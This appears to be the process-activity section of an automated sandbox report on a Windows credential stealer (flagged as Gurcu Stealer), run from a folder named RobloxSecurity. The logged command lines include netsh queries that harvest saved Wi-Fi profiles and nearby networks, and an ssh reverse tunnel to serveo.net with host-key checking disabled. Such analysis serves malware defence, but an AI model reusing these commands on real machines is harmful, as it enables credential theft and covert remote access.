                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:18
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x10dd5580000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:19
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:20
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:21
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show networks mode=bssid
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:22
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr "SSID BSSID Signal"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:23
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:24
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:25
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:26
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show profiles
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:27
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:28
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:29
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:30
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:31
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show networks mode=bssid
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:32
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr "SSID BSSID Signal"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:33
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                                                                                                    Imagebase:0x7ff734ff0000
                                                                                                    File size:946'176 bytes
                                                                                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:34
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:35
                                                                                                    Start time:16:17:18
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                                                                                                    Imagebase:0x7ff734ff0000
                                                                                                    File size:946'176 bytes
                                                                                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:36
                                                                                                    Start time:16:17:18
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:41
                                                                                                    Start time:16:17:22
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                                                                                                    Imagebase:0x7ff6065e0000
                                                                                                    File size:570'736 bytes
                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:42
                                                                                                    Start time:16:18:01
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x17a71230000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:44
                                                                                                    Start time:16:19:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x1ec7f190000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:45
                                                                                                    Start time:16:20:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x167cfae0000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:46
                                                                                                    Start time:16:21:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x1cf0ab30000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Disassembly

                                                                                                    No disassembly